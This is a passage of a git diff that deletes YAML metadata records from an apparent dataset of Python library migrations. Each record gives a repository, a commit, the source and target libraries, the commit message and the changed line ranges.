geoportal/c2cgeoportal_geoportal/scripts/urllogin.py - lines: - - '48:48' - - 53:53-54 -- filepath: geoportal/c2cgeoportal_geoportal/__init__.py - lines: - - 322-323:326-327 diff --git a/v1/data/migration/1476b62_python-social-auth,social-auth-app-django.yaml b/v1/data/migration/1476b62_python-social-auth,social-auth-app-django.yaml deleted file mode 100644 index 92a52f7..0000000 --- a/v1/data/migration/1476b62_python-social-auth,social-auth-app-django.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 1476b62_python-social-auth,social-auth-app-django -source: python-social-auth -target: social-auth-app-django -repo: onespacemedia/project-template -commit: 1476b623632cb53d778b5c2d9899e905ba2ab9c6 -pair_id: python-social-auth,social-auth-app-django -commit_message: 'Migrate to from python-social-auth to social-auth-app-django - - - Closes #110' -commit_url: https://github.com/onespacemedia/project-template/commit/1476b623 -code_changes: [] diff --git a/v1/data/migration/19dde42_pycryptodome,pycryptodomex.yaml b/v1/data/migration/19dde42_pycryptodome,pycryptodomex.yaml deleted file mode 100644 index 87339bc..0000000 --- a/v1/data/migration/19dde42_pycryptodome,pycryptodomex.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: 19dde42_pycryptodome,pycryptodomex -source: pycryptodome -target: pycryptodomex -repo: azure/aztk -commit: 19dde429a702c29bdcf86a69805053ecfd02edee -pair_id: pycryptodome,pycryptodomex -commit_message: 'Fix: switch from pycryptodome to pycryptodomex (#564) - - - Fix: switch from pycryptodome to pycryptodomex' -commit_url: https://github.com/azure/aztk/commit/19dde429 -code_changes: -- filepath: aztk/client.py - lines: - - '15:15' -- filepath: aztk/node_scripts/install/create_user.py - lines: - - 4-5:4-5 -- filepath: aztk/spark/models/models.py - lines: - - '2:2' -- filepath: aztk/utils/secure_utils.py - lines: - - 1-3:1-3 diff --git a/v1/data/migration/1c574c1_requests,aiohttp.yaml b/v1/data/migration/1c574c1_requests,aiohttp.yaml deleted file mode 100644 index 6ae17c9..0000000 --- a/v1/data/migration/1c574c1_requests,aiohttp.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 1c574c1_requests,aiohttp -source: requests -target: aiohttp -repo: lordofpolls/rule34-api-wrapper -commit: 1c574c14c88c0cad7705c9b81b9b4b3f75ea7485 -pair_id: requests,aiohttp -commit_message: Removed unused requirements, and added new ones -commit_url: https://github.com/lordofpolls/rule34-api-wrapper/commit/1c574c14 -code_changes: [] diff --git a/v1/data/migration/1d8923a_requests,aiohttp.yaml b/v1/data/migration/1d8923a_requests,aiohttp.yaml deleted file mode 100644 index 11d2629..0000000 --- a/v1/data/migration/1d8923a_requests,aiohttp.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: 1d8923a_requests,aiohttp -source: requests -target: aiohttp -repo: raptor123471/dingolingo -commit: 1d8923abae93915ad877774e0fdc812d6c53a70b -pair_id: requests,aiohttp -commit_message: Replace requests with aiohttp -commit_url: https://github.com/raptor123471/dingolingo/commit/1d8923ab -code_changes: -- filepath: musicbot/linkutils.py - lines: - - '1:1' - - 35-36:36-38 - - 98:100-102 diff --git a/v1/data/migration/22cc3f0_flask,quart.yaml b/v1/data/migration/22cc3f0_flask,quart.yaml deleted file mode 100644 index 04302d8..0000000 --- a/v1/data/migration/22cc3f0_flask,quart.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: 22cc3f0_flask,quart -source: flask -target: quart -repo: intel/stacks-usecase -commit: 22cc3f007a3267ca09a3f53b84fdbfff1f045e88 -pair_id: flask,quart -commit_message: switching flask to a high perf asyc server -commit_url: https://github.com/intel/stacks-usecase/commit/22cc3f00 -code_changes: -- filepath: github-issue-classification/python/rest.py - lines: - - 19:19-21 - - '23:27' - - 42-44:49-51 - - '46:53' - - '51:58' diff --git a/v1/data/migration/24a848d_flask,fastapi.yaml b/v1/data/migration/24a848d_flask,fastapi.yaml deleted file mode 100644 index 645a9e7..0000000 --- a/v1/data/migration/24a848d_flask,fastapi.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 24a848d_flask,fastapi -source: flask -target: fastapi -repo: bretttolbert/verbecc-svc -commit: 24a848d285ae2c6f3e5b06d1a8ee718cb3f17133 -pair_id: flask,fastapi -commit_message: switched from Flask to FastAPI/uvicorn -commit_url: https://github.com/bretttolbert/verbecc-svc/commit/24a848d2 -code_changes: -- filepath: python/verb_conjugate_fr/__init__.py - lines: - - 2-3:2 diff --git a/v1/data/migration/24a848d_flask,uvicorn.yaml b/v1/data/migration/24a848d_flask,uvicorn.yaml deleted file mode 100644 index 2a9087f..0000000 --- a/v1/data/migration/24a848d_flask,uvicorn.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 24a848d_flask,uvicorn -source: flask -target: uvicorn -repo: bretttolbert/verbecc-svc -commit: 24a848d285ae2c6f3e5b06d1a8ee718cb3f17133 -pair_id: flask,uvicorn -commit_message: switched from Flask to FastAPI/uvicorn -commit_url: https://github.com/bretttolbert/verbecc-svc/commit/24a848d2 -code_changes: [] diff --git a/v1/data/migration/26c8e74_dataproperty,typepy.yaml b/v1/data/migration/26c8e74_dataproperty,typepy.yaml deleted file mode 100644 index bd44c97..0000000 --- a/v1/data/migration/26c8e74_dataproperty,typepy.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: 26c8e74_dataproperty,typepy -source: dataproperty -target: typepy -repo: thombashi/sqlitebiter -commit: 26c8e7467fb764d6abca03d6830f7679cbfc3ea1 -pair_id: dataproperty,typepy -commit_message: 'Replace a module: DataProperty to typepy' -commit_url: https://github.com/thombashi/sqlitebiter/commit/26c8e746 -code_changes: -- filepath: sqlitebiter/sqlitebiter.py - lines: - - '13:17' - - '46:46' - - 136:136 - - 227:227 - - 239:239 diff --git a/v1/data/migration/27e2a46_pillow,torchvision.yaml b/v1/data/migration/27e2a46_pillow,torchvision.yaml deleted file mode 100644 index 7ded605..0000000 --- a/v1/data/migration/27e2a46_pillow,torchvision.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 27e2a46_pillow,torchvision -source: pillow -target: torchvision -repo: deep-spin/opennmt-ape -commit: 27e2a46c1d1505324032b1d94fc6ce24d5b67e97 -pair_id: pillow,torchvision -commit_message: cleaning up imagenet example and making it depend on torchvision -commit_url: https://github.com/deep-spin/opennmt-ape/commit/27e2a46c -code_changes: [] diff --git a/v1/data/migration/2960ec6_argparse,configargparse.yaml b/v1/data/migration/2960ec6_argparse,configargparse.yaml deleted file mode 100644 index d90a4d2..0000000 --- a/v1/data/migration/2960ec6_argparse,configargparse.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: 2960ec6_argparse,configargparse -source: argparse -target: configargparse -repo: rocketmap/rocketmap -commit: 2960ec68f85274c37068e2577f28c44eecc4ff26 -pair_id: argparse,configargparse -commit_message: "Fix up this configuration mess (#2021)\n\n* Kill credentials.json\ - \ with fire\n* Match up our command line options with config.ini options\n* Switch\ - \ to ConfigArgParser to make the task of overriding\n config.ini options via command\ - \ line parameters easier\n* This provides a much easier long-term method of maintaining\n\ - \ config/argument options" -commit_url: https://github.com/rocketmap/rocketmap/commit/2960ec68 -code_changes: -- filepath: pogom/utils.py - lines: - - '6:6' - - '70:33' - - '73:35' - - '74:36' - - '75:37' - - '77:29' - - '86:47' - - '87:48' - - '88:49' diff --git a/v1/data/migration/2adc6a9_xlrd,openpyxl.yaml b/v1/data/migration/2adc6a9_xlrd,openpyxl.yaml deleted file mode 100644 index 3c892fd..0000000 --- a/v1/data/migration/2adc6a9_xlrd,openpyxl.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 2adc6a9_xlrd,openpyxl -source: xlrd -target: openpyxl -repo: dbvis-ukon/coronavis -commit: 2adc6a9320c3dc5c801b75d1e32ca07bc13c2891 -pair_id: xlrd,openpyxl -commit_message: '[refactor] migrate from xlrd to openpyxl and prepare for python 3.9+' -commit_url: https://github.com/dbvis-ukon/coronavis/commit/2adc6a93 -code_changes: [] diff --git a/v1/data/migration/2c40713_pytz,pendulum.yaml b/v1/data/migration/2c40713_pytz,pendulum.yaml deleted file mode 100644 index a94a4ae..0000000 --- a/v1/data/migration/2c40713_pytz,pendulum.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 2c40713_pytz,pendulum -source: pytz -target: pendulum -repo: oddluck/limnoria-plugins -commit: 2c40713d3a2778d6f729d896372c3bcd74302104 -pair_id: pytz,pendulum -commit_message: 'WorldTime: replace pytz with pendulum' -commit_url: https://github.com/oddluck/limnoria-plugins/commit/2c40713d -code_changes: -- filepath: WorldTime/plugin.py - lines: - - '12:13' diff --git a/v1/data/migration/2d9cf64_slackclient,slack-sdk.yaml b/v1/data/migration/2d9cf64_slackclient,slack-sdk.yaml deleted file mode 100644 index 90ba4ea..0000000 --- a/v1/data/migration/2d9cf64_slackclient,slack-sdk.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: 2d9cf64_slackclient,slack-sdk -source: slackclient -target: slack-sdk -repo: zulip/python-zulip-api -commit: 2d9cf64db860ab5e5eabb8151254b0f3dab609bd -pair_id: slackclient,slack-sdk -commit_message: 'slack-bridge: Use slack_sdk instead of the deprecated slackclient.' -commit_url: https://github.com/zulip/python-zulip-api/commit/2d9cf64d -code_changes: -- filepath: zulip/integrations/bridge_with_slack/run-slack-bridge - lines: - - 10:10-11 - - '47:48' - - '50:51' - - 84:85 diff --git a/v1/data/migration/2fc0f26_pil,pillow.yaml b/v1/data/migration/2fc0f26_pil,pillow.yaml deleted file mode 100644 index 74386ae..0000000 --- a/v1/data/migration/2fc0f26_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 2fc0f26_pil,pillow -source: pil -target: pillow -repo: django-wiki/django-wiki -commit: 2fc0f26aa3b7f86b79c477ed89fd0aff3a476567 -pair_id: pil,pillow -commit_message: Switch to Pillow and the dev version of sorl v12 -commit_url: https://github.com/django-wiki/django-wiki/commit/2fc0f26a -code_changes: [] diff --git a/v1/data/migration/311c7ce_logbook,loguru.yaml b/v1/data/migration/311c7ce_logbook,loguru.yaml deleted file mode 100644 index ce75a45..0000000 --- a/v1/data/migration/311c7ce_logbook,loguru.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 311c7ce_logbook,loguru -source: logbook -target: loguru -repo: thombashi/sqlitebiter -commit: 311c7ce50a89316d5cab9bb2daef05315175faf2 -pair_id: logbook,loguru -commit_message: Replace the logging library -commit_url: https://github.com/thombashi/sqlitebiter/commit/311c7ce5 -code_changes: -- filepath: sqlitebiter/sqlitebiter.py - lines: - - 15-16:20 - - 64,68:64 diff --git a/v1/data/migration/31212eb_pil,pillow.yaml b/v1/data/migration/31212eb_pil,pillow.yaml deleted file mode 100644 index 4d71207..0000000 --- a/v1/data/migration/31212eb_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 31212eb_pil,pillow -source: pil -target: pillow -repo: wikibook/flask -commit: 31212eb04c86443fb12a29850ae9d17ecbfada21 -pair_id: pil,pillow -commit_message: Modify library dependency PIL to pillow. -commit_url: https://github.com/wikibook/flask/commit/31212eb0 -code_changes: [] diff --git a/v1/data/migration/33c7a3f_pytz,pendulum.yaml b/v1/data/migration/33c7a3f_pytz,pendulum.yaml deleted file mode 100644 index 8ebbece..0000000 --- a/v1/data/migration/33c7a3f_pytz,pendulum.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: 33c7a3f_pytz,pendulum -source: pytz -target: pendulum -repo: oddluck/limnoria-plugins -commit: 33c7a3fc0878d87ee803db91c17523a9e61af3ed -pair_id: pytz,pendulum -commit_message: 'NHL/NBA: replace pytz dependency' -commit_url: https://github.com/oddluck/limnoria-plugins/commit/33c7a3fc -code_changes: -- filepath: NHL/plugin.py - lines: - - '35:26' -- filepath: NBA/plugin.py - lines: - - '50:40' diff --git a/v1/data/migration/356ce56_raven,sentry-sdk.yaml b/v1/data/migration/356ce56_raven,sentry-sdk.yaml deleted file mode 100644 index fffdc1f..0000000 --- a/v1/data/migration/356ce56_raven,sentry-sdk.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 356ce56_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: fnp/wolnelektury -commit: 356ce56229b7439ae6f35f8f80e480bdfa8bff56 -pair_id: raven,sentry-sdk -commit_message: Migrate from raven to sentry-sdk. -commit_url: https://github.com/fnp/wolnelektury/commit/356ce562 -code_changes: [] diff --git a/v1/data/migration/35ae8f3_mysql-python,mysqlclient.yaml b/v1/data/migration/35ae8f3_mysql-python,mysqlclient.yaml deleted file mode 100644 index 9d6cce6..0000000 --- a/v1/data/migration/35ae8f3_mysql-python,mysqlclient.yaml +++ /dev/null @@ -1,10 +0,0 @@ -id: 35ae8f3_mysql-python,mysqlclient -source: mysql-python -target: mysqlclient -repo: vippool/clerk -commit: 35ae8f3a8f27de80f9650df805c8abfde2b21800 -pair_id: mysql-python,mysqlclient -commit_message: "fix: mysql-python\u304B\u3089mysqlclient\u3078\u79FB\u884C&\u7D30\ - \u304B\u306A\u4FEE\u6B63" -commit_url: https://github.com/vippool/clerk/commit/35ae8f3a -code_changes: [] diff --git a/v1/data/migration/35d8144_urllib,urllib3.yaml b/v1/data/migration/35d8144_urllib,urllib3.yaml deleted file mode 100644 index 1962603..0000000 --- a/v1/data/migration/35d8144_urllib,urllib3.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 35d8144_urllib,urllib3 -source: urllib -target: urllib3 -repo: hail-is/hail -commit: 35d8144a61a788095f6a63fab5f28bcd3cb17a98 -pair_id: urllib,urllib3 -commit_message: fix-maste6 (#5954) -commit_url: https://github.com/hail-is/hail/commit/35d8144a -code_changes: [] diff --git a/v1/data/migration/3abbc43_flask,fastapi.yaml b/v1/data/migration/3abbc43_flask,fastapi.yaml deleted file mode 100644 index ed2b01f..0000000 --- a/v1/data/migration/3abbc43_flask,fastapi.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 3abbc43_flask,fastapi -source: flask -target: fastapi -repo: virtuber/openvtuber -commit: 3abbc431e586218470f47eac10fa6d351c6fe907 -pair_id: flask,fastapi -commit_message: flask to fastapi and uvicorn -commit_url: https://github.com/virtuber/openvtuber/commit/3abbc431 -code_changes: -- filepath: openvtuber-server/src/openvtuber/web/web.py - lines: - - 3:4-5 - - '6:8' diff --git a/v1/data/migration/3abbc43_flask,uvicorn.yaml b/v1/data/migration/3abbc43_flask,uvicorn.yaml deleted file mode 100644 index d7bc655..0000000 --- a/v1/data/migration/3abbc43_flask,uvicorn.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 3abbc43_flask,uvicorn -source: flask -target: uvicorn -repo: virtuber/openvtuber -commit: 3abbc431e586218470f47eac10fa6d351c6fe907 -pair_id: flask,uvicorn -commit_message: flask to fastapi and uvicorn -commit_url: https://github.com/virtuber/openvtuber/commit/3abbc431 -code_changes: -- filepath: openvtuber-server/src/openvtuber/web/web.py - lines: - - '3:3' - - '17:16' diff --git a/v1/data/migration/3f786f4_uwsgi,gunicorn.yaml b/v1/data/migration/3f786f4_uwsgi,gunicorn.yaml deleted file mode 100644 index 67586c1..0000000 --- a/v1/data/migration/3f786f4_uwsgi,gunicorn.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 3f786f4_uwsgi,gunicorn -source: uwsgi -target: gunicorn -repo: materialsproject/mpcontribs -commit: 3f786f4d1527e53a5fa2865f71e6bbad8add41a9 -pair_id: uwsgi,gunicorn -commit_message: switch to gunicorn[gevent] -commit_url: https://github.com/materialsproject/mpcontribs/commit/3f786f4d -code_changes: [] diff --git a/v1/data/migration/432afa4_jwt,pyjwt.yaml b/v1/data/migration/432afa4_jwt,pyjwt.yaml deleted file mode 100644 index e75c590..0000000 --- a/v1/data/migration/432afa4_jwt,pyjwt.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 432afa4_jwt,pyjwt -source: jwt -target: pyjwt -repo: dcos/dcos -commit: 432afa46d1e1fc5043f9c7a111858cbdde61f239 -pair_id: jwt,pyjwt -commit_message: 'test-e2e: use the correct jwt library' -commit_url: https://github.com/dcos/dcos/commit/432afa46 -code_changes: [] diff --git a/v1/data/migration/4377d67_django-rest-swagger,drf-yasg.yaml b/v1/data/migration/4377d67_django-rest-swagger,drf-yasg.yaml deleted file mode 100644 index 98984c9..0000000 --- a/v1/data/migration/4377d67_django-rest-swagger,drf-yasg.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: 4377d67_django-rest-swagger,drf-yasg -source: django-rest-swagger -target: drf-yasg -repo: opengisch/qfieldcloud -commit: 4377d67a99ed8b6680276cbf4585cbac18439b37 -pair_id: django-rest-swagger,drf-yasg -commit_message: 'Replace the deprecated rest_framework_swagger with drf_yasg - - - using redoc' -commit_url: https://github.com/opengisch/qfieldcloud/commit/4377d67a -code_changes: -- filepath: web-app/qfieldcloud/urls.py - lines: - - 18:20-21 diff --git a/v1/data/migration/43e8ec2_celery,rq.yaml b/v1/data/migration/43e8ec2_celery,rq.yaml deleted file mode 100644 index 39566f2..0000000 --- a/v1/data/migration/43e8ec2_celery,rq.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 43e8ec2_celery,rq -source: celery -target: rq -repo: lonelam/onlinejudgeshu -commit: 43e8ec2d90a3f14b3da385bf679c3287f837ab71 -pair_id: celery,rq -commit_message: "\u5220\u9664 celery \u4F9D\u8D56" -commit_url: https://github.com/lonelam/onlinejudgeshu/commit/43e8ec2d -code_changes: [] diff --git a/v1/data/migration/45d94dd_gcloud-aio-core,aiohttp.yaml b/v1/data/migration/45d94dd_gcloud-aio-core,aiohttp.yaml deleted file mode 100644 index 94e385a..0000000 --- a/v1/data/migration/45d94dd_gcloud-aio-core,aiohttp.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 45d94dd_gcloud-aio-core,aiohttp -source: gcloud-aio-core -target: aiohttp -repo: talkiq/gcloud-aio -commit: 45d94ddaf969648d5479ff480a92b16d537716f9 -pair_id: gcloud-aio-core,aiohttp -commit_message: 'refactor(bigquery): remove core.http dependency' -commit_url: https://github.com/talkiq/gcloud-aio/commit/45d94dda -code_changes: -- filepath: bigquery/gcloud/aio/bigquery/bigquery.py - lines: - - '6:5' - - 96-100:91-94 diff --git a/v1/data/migration/45fac3c_dataproperty,typepy.yaml b/v1/data/migration/45fac3c_dataproperty,typepy.yaml deleted file mode 100644 index c64629a..0000000 --- a/v1/data/migration/45fac3c_dataproperty,typepy.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: 45fac3c_dataproperty,typepy -source: dataproperty -target: typepy -repo: thombashi/pingparsing -commit: 45fac3cb38661f80fc8bd129ce633cfd15423835 -pair_id: dataproperty,typepy -commit_message: 'Replace a module: DataProperty to typepy' -commit_url: https://github.com/thombashi/pingparsing/commit/45fac3cb -code_changes: -- filepath: pingparsing/_pingtransmitter.py - lines: - - 86:87 - - 154:159 - - 100:101 - - 110:112 - - 122:125 - - 144:148 - - 154:159 - - 11:11-12 -- filepath: pingparsing/_pingparsing.py - lines: - - '10:11' - - 134:135 - - 156:157 - - 186:187 - - 233:234 diff --git a/v1/data/migration/472f336_xlsxwriter,openpyxl.yaml b/v1/data/migration/472f336_xlsxwriter,openpyxl.yaml deleted file mode 100644 index 99025f1..0000000 --- a/v1/data/migration/472f336_xlsxwriter,openpyxl.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 472f336_xlsxwriter,openpyxl -source: xlsxwriter -target: openpyxl -repo: bcgov/gwells -commit: 472f336f5db32ead27b6f4e171c6b8f782da8a02 -pair_id: xlsxwriter,openpyxl -commit_message: Fixed excel export (no more warnings), removed redundant code -commit_url: https://github.com/bcgov/gwells/commit/472f336f -code_changes: -- filepath: app/backend/wells/management/commands/export.py - lines: - - '11:12' - - '53:53' diff --git a/v1/data/migration/49cf693_pycrypto,pycryptodome.yaml b/v1/data/migration/49cf693_pycrypto,pycryptodome.yaml deleted file mode 100644 index d36fc98..0000000 --- a/v1/data/migration/49cf693_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,11 +0,0 @@ -id: 49cf693_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: guardicore/monkey -commit: 49cf693197378c1852bda5ea0c9797aa8232ed8c -pair_id: pycrypto,pycryptodome -commit_message: 'Add option for password authentication with island - - Replace PyCrypto with Cryptodome' -commit_url: https://github.com/guardicore/monkey/commit/49cf6931 -code_changes: [] diff --git a/v1/data/migration/4ad53b5_py-bcrypt,bcrypt.yaml b/v1/data/migration/4ad53b5_py-bcrypt,bcrypt.yaml deleted file mode 100644 index e84187a..0000000 --- a/v1/data/migration/4ad53b5_py-bcrypt,bcrypt.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: 4ad53b5_py-bcrypt,bcrypt -source: py-bcrypt -target: bcrypt -repo: weasyl/weasyl -commit: 4ad53b59da2fd7452546f04025414780911190f2 -pair_id: py-bcrypt,bcrypt -commit_message: 'Change out ''py-bcrypt'' for ''bcrypt''. (#80) - - - * Initial changeout of py-bcrypt for pyca''s bcrypt - - - Resolves Issue #52 - - - * Fixed bcrypt implementation switchover - - - Removing inadvertantly added link file, and adding ''/vagrant/ to .gitignore - - - * Style fixes for bcrypt implementation - - - * Fixed spacing error for split line - - - Line 77-78, split parameter did not match starting location of above parameter; - PEP 8 - - - * Remove unneeded parentheses; shift .encode() earlier in function to eliminate - two uses - - - * Pre .encode() remaining HASHSUMs - - - * Unwrap previously wrapped lines' -commit_url: https://github.com/weasyl/weasyl/commit/4ad53b59 -code_changes: [] diff --git a/v1/data/migration/4c3400a_pil,pillow.yaml b/v1/data/migration/4c3400a_pil,pillow.yaml deleted file mode 100644 index 6093701..0000000 --- a/v1/data/migration/4c3400a_pil,pillow.yaml +++ /dev/null @@ -1,11 +0,0 @@ -id: 4c3400a_pil,pillow -source: pil -target: pillow -repo: h3/python-dad -commit: 4c3400a0e706f809adc85b08103b0dd5858fd5b6 -pair_id: pil,pillow -commit_message: Fixed formatting bug in ubuntu sysdef, now dad installs requirements - only on initial setup, changed requirements.txt template to use pillow instead of - PIL since PIL's packaging is messy and breaks under virtualenv -commit_url: https://github.com/h3/python-dad/commit/4c3400a0 -code_changes: [] diff --git a/v1/data/migration/4fc081b_keras,torch.yaml b/v1/data/migration/4fc081b_keras,torch.yaml deleted file mode 100644 index 45b64bc..0000000 --- a/v1/data/migration/4fc081b_keras,torch.yaml +++ /dev/null @@ -1,10 +0,0 @@ -id: 4fc081b_keras,torch -source: keras -target: torch -repo: charlespikachu/aigames -commit: 4fc081b698262b6a52e65b348c13c1a41e3e0eca -pair_id: keras,torch -commit_message: prepare for training algo1 in trexrush and also add a new algo for - trexrush -commit_url: https://github.com/charlespikachu/aigames/commit/4fc081b6 -code_changes: [] diff --git a/v1/data/migration/50b7bae_mysqlclient,psycopg2.yaml b/v1/data/migration/50b7bae_mysqlclient,psycopg2.yaml deleted file mode 100644 index 2593943..0000000 --- a/v1/data/migration/50b7bae_mysqlclient,psycopg2.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: 50b7bae_mysqlclient,psycopg2 -source: mysqlclient -target: psycopg2 -repo: desec-io/desec-stack -commit: 50b7baeda75d9e9deb388e4666c372b32d959e95 -pair_id: mysqlclient,psycopg2 -commit_message: 'BREAKING feat(dbapi): switch to postgres, fixes #430 - - - Migration instructions: - - https://github.com/desec-io/desec-stack/pull/432#issuecomment-680785746' -commit_url: https://github.com/desec-io/desec-stack/commit/50b7baed -code_changes: [] diff --git a/v1/data/migration/5169173_flask-restplus,flask-restx.yaml b/v1/data/migration/5169173_flask-restplus,flask-restx.yaml deleted file mode 100644 index 2c89a73..0000000 --- a/v1/data/migration/5169173_flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: 5169173_flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -repo: kizniche/mycodo -commit: 516917351d7d8341375db4481ac72910c9510a42 -pair_id: flask-restplus,flask-restx -commit_message: Merge from Flask-RESTPlus to Flask-RESTX ([#742 -commit_url: https://github.com/kizniche/mycodo/commit/51691735 -code_changes: -- filepath: mycodo/mycodo_flask/api/daemon.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/__init__.py - lines: - - '6:6' -- filepath: mycodo/mycodo_flask/api/output.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/math.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/measurement.py - lines: - - 8-10:8-10 -- filepath: mycodo/mycodo_flask/api/sql_schema_fields.py - lines: - - '2:2' -- filepath: mycodo/mycodo_flask/api/pid.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/input.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/choices.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/settings.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/controller.py - lines: - - 7-9:7-9 diff --git a/v1/data/migration/51f2688_gevent,eventlet.yaml b/v1/data/migration/51f2688_gevent,eventlet.yaml deleted file mode 100644 index 1708620..0000000 --- a/v1/data/migration/51f2688_gevent,eventlet.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: 51f2688_gevent,eventlet -source: gevent -target: eventlet -repo: teamsempo/sempoblockchain -commit: 51f26884e37364117176febbb2649d4fa94918e7 -pair_id: gevent,eventlet -commit_message: 'Move away from gevent again (#433) - - - * friendship ended with eventlet gevent is my new best friend - - - * add dnspython' -commit_url: https://github.com/teamsempo/sempoblockchain/commit/51f26884 -code_changes: [] diff --git a/v1/data/migration/528b986_jwt,pyjwt.yaml b/v1/data/migration/528b986_jwt,pyjwt.yaml deleted file mode 100644 index 6e627f3..0000000 --- a/v1/data/migration/528b986_jwt,pyjwt.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 528b986_jwt,pyjwt -source: jwt -target: pyjwt -repo: reddit/baseplate.py -commit: 528b986f62e566611c00ba4fa13de526a6a78c1e -pair_id: jwt,pyjwt -commit_message: Fix PyPI package name for PyJWT -commit_url: https://github.com/reddit/baseplate.py/commit/528b986f -code_changes: [] diff --git a/v1/data/migration/5393290_pil,pillow.yaml b/v1/data/migration/5393290_pil,pillow.yaml deleted file mode 100644 index f9bcd27..0000000 --- a/v1/data/migration/5393290_pil,pillow.yaml +++ /dev/null @@ -1,10 +0,0 @@ -id: 5393290_pil,pillow -source: pil -target: pillow -repo: slav0nic/djangobb -commit: 53932904f35c8d8f60628fdc33eb618e450abbe2 -pair_id: pil,pillow -commit_message: update to requirements (using Pillow than PIL that is obsolete. Also - added new haystack and security fixes of django) -commit_url: https://github.com/slav0nic/djangobb/commit/53932904 -code_changes: [] diff --git a/v1/data/migration/53f2073_requests,aiohttp.yaml b/v1/data/migration/53f2073_requests,aiohttp.yaml deleted file mode 100644 index 464ee10..0000000 --- a/v1/data/migration/53f2073_requests,aiohttp.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 53f2073_requests,aiohttp -source: requests -target: aiohttp -repo: mkdir700/chaoxing_auto_sign -commit: 53f2073234e00bef35896690e748eabd4b4632ed -pair_id: requests,aiohttp -commit_message: "\u4FEE\u590D\u901F\u5EA6\u8FC7\u5FEB\u5BFC\u81F4\u7684\u95EE\u9898" -commit_url: https://github.com/mkdir700/chaoxing_auto_sign/commit/53f20732 -code_changes: [] diff --git a/v1/data/migration/547f6d9_lockfile,fasteners.yaml b/v1/data/migration/547f6d9_lockfile,fasteners.yaml deleted file mode 100644 index 69566e1..0000000 --- a/v1/data/migration/547f6d9_lockfile,fasteners.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: 547f6d9_lockfile,fasteners -source: lockfile -target: fasteners -repo: kizniche/mycodo -commit: 547f6d9f22e569007c1066e36ee5142f5e1b533d -pair_id: lockfile,fasteners -commit_message: Replace deprecated LockFile with fasteners (#260) -commit_url: https://github.com/kizniche/mycodo/commit/547f6d9f -code_changes: -- filepath: mycodo/sensors/mh_z16.py - lines: - - 155:156 - - '22:22' - - 51:152 -- filepath: mycodo/sensors/k30.py - lines: - - 101:100 - - '3:3' - - 95:96 -- filepath: mycodo/controller_sensor.py - lines: - - '31:26' -- filepath: mycodo/sensors/mh_z19.py - lines: - - 101:102 - - '3:3' - - 95:98 -- filepath: mycodo/devices/atlas_scientific_uart.py - lines: - - '5:3' - - '51:54' - - '55:58' -- filepath: mycodo/devices/atlas_scientific_i2c.py - lines: - - '7:3' - - 77:79 - - 81:83 diff --git a/v1/data/migration/56e3253_python-ldap,ldap3.yaml b/v1/data/migration/56e3253_python-ldap,ldap3.yaml deleted file mode 100644 index 3bfba8e..0000000 --- a/v1/data/migration/56e3253_python-ldap,ldap3.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 56e3253_python-ldap,ldap3 -source: python-ldap -target: ldap3 -repo: tracim/tracim -commit: 56e3253fe473d1a9d18f197bad11399259958d5e -pair_id: python-ldap,ldap3 -commit_message: Use pyramid_ldap3 instead of pyramid_ldap -commit_url: https://github.com/tracim/tracim/commit/56e3253f -code_changes: [] diff --git a/v1/data/migration/57d12c4_openpyxl,xlsxwriter.yaml b/v1/data/migration/57d12c4_openpyxl,xlsxwriter.yaml deleted file mode 100644 index 0a876d6..0000000 --- a/v1/data/migration/57d12c4_openpyxl,xlsxwriter.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 57d12c4_openpyxl,xlsxwriter -source: openpyxl -target: xlsxwriter -repo: bcgov/gwells -commit: 57d12c42941e0afb07ac46fb51f8316d6c5a0cea -pair_id: openpyxl,xlsxwriter -commit_message: openpyxl seems to cause pod to crash - maybe too much memory? -commit_url: https://github.com/bcgov/gwells/commit/57d12c42 -code_changes: -- filepath: app/backend/wells/management/commands/export.py - lines: - - '12:12' diff --git 